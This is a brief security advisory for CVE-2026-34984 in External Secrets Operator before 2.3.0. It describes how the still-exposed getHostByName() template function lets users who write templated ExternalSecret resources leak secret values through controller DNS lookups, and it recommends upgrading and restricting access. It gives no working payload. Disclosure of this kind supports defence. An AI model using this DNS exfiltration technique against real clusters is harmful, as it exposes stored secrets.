CVE-2026-34984

Name of the Vulnerable Software and Affected Versions External Secrets Operator versions prior to 2.3.0

Description The v2 template engine in runtime/template/v2/template.go removes env and expandenv from TxtFuncMap() but leaves the getHostByName() function accessible to user-controlled templates. Since the controller executes templates within its own process, an attacker capable of creating or updating templated ExternalSecret resources can trigger controller-side DNS lookups using secret-derived values. This enables a DNS exfiltration primitive, allowing secret material to be leaked via DNS queries without requiring direct outbound network access from the attacker's workload. This results in a confidentiality issue in environments where lower-trust users can author these resources and the controller has DNS resolution capabilities.

Recommendations Update to version 2.3.0. Restrict the ability of untrusted or lower-trust users to create or update templated ExternalSecret resources.